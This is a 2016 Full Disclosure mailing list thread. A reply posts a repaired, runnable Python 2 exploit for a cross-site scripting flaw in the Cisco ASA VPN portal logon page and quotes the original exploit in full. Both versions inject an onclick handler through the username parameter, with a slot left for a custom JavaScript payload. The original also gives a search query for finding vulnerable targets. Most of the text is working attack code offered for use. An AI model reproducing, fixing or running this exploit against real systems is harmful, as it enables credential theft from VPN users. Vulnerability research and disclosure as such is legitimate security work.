Message-ID: <CAOOpvAqwULPVbT9r0WcUx9+_yTE7AnptQsNwL9LDENSR3Yu-7w@mail.gmail.com>
Date: Thu, 18 Feb 2016 10:03:56 -0600
From: Joey Maresca <jmaresca@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Cisco ASA VPN - Zero Day Exploit

For folks who want code that runs, I did you all a favor: fixed the indent issues, removed unused libraries, fixed SSL certificate validation checks causing failures, fixed typos that prevented running, killed dead code, and made sure it actually used the Port input. All while stripping out the unnecessary fluff. It may not be perfect but it will at least now run.

import sys
import ssl, httplib  # Python 2: httplib became http.client in Python 3

if __name__ == '__main__':
    try:
        Target = sys.argv[1]
        Port = int(sys.argv[2])
        # Here goes your custom JS agent code
        Payload = "alert(1)"
        # The username value closes the hidden input's value="..." and appends an onclick handler
        VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
        CraftedRequest = VulnerableURL
        # Start the connection; ASA portals usually present self-signed certs, so skip verification
        connection = httplib.HTTPSConnection(Target, Port, context=ssl._create_unverified_context())
        connection.request('GET', CraftedRequest)
        Response = connection.getresponse()
        print "Server status response:", Response.status, Response.reason
        data = Response.read()
        # Find the injection in the response
        vulnerable = "Target is not vulnerable"
        for line in str(data).splitlines():
            if "juansacco" in line:
                vulnerable = "Target is vulnerable"
        print "Result of the test:", vulnerable
        connection.close()
    except Exception, e:
        print "Exploit connection closed " + str(e)

On Wed, Feb 17, 2016 at 4:11 AM, Juan Sacco <juansacco@...il.com> wrote:
> # Exploit author: Juan Sacco - jsacco@...loitpack.com
> # Affected program: Cisco ASA VPN Portal - Zero Day
> # Cisco ASA VPN is prone to a XSS on the password recovery page.
> # This vulnerability can be used by an attacker to capture other user's credentials.
> # The password recovery form fails to filter properly the hidden inputs fields.
> #
> # This Zero Day exploit has been developed and discovered by Juan Sacco.
> # Exploit Pack - Team http://exploitpack.com
> #
> # Release Dates:
> # Reported to Cisco PSIRT Feb 4/2016
> # Cisco Dev Team working on a fix Feb 15/2016
> # Cisco PSIRT report a CVE Feb 15/2016
> # Exploit Pack disclose the bug Feb 15/2016
> # Disclosure of the Exploit Feb 16/2016
> #
> # Look for vulnerable targets here: https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
> # More than 18.000 results in Google only
>
> import string, sys
> import socket, httplib
> import telnetlib
>
> def run():
>     try:
>         Target = sys.argv[1]
>         Port = int(sys.argv[2])
>         # Here goes your custom JS agent code
>         Payload = "alert(1)"
>         VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
>         CraftedRequest = VulnerableURL
>         # Start the connection
>         connection = httplib.HTTPSConnection(Target)
>         connection.request('GET', CraftedRequest)
>         Response = connection.getresponse()
>         print "Server status response:", Response.status, Response.reason
>         data = Response.read()
>         vulnerable = "Target is not vulnerable"
>         for line in str(data).splitlines():
>             if "juansacco\\\"" in line:
>                 vulnerable = "Targer is vulnerable"
>         if vulnerable != "Not vulnerable":
>             print "Result of the test:", vulnerable
>         # Find the injection on the response
>         connection.close()
>     except Exception,e:
>         print "Exploit connection closed " + str(e)
>
> if __name__ == '__main__':
>     print "Cisco VPN ASA Exploit - Zero Day"
>     print "################################"
>     print "Author: Juan Sacco - jsacco@...loitpack.com"
>
>     try:
>         Target = sys.argv[1]
>         Port = sys.argv[2]
>     except IndexError:
>         pass
>     run()
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/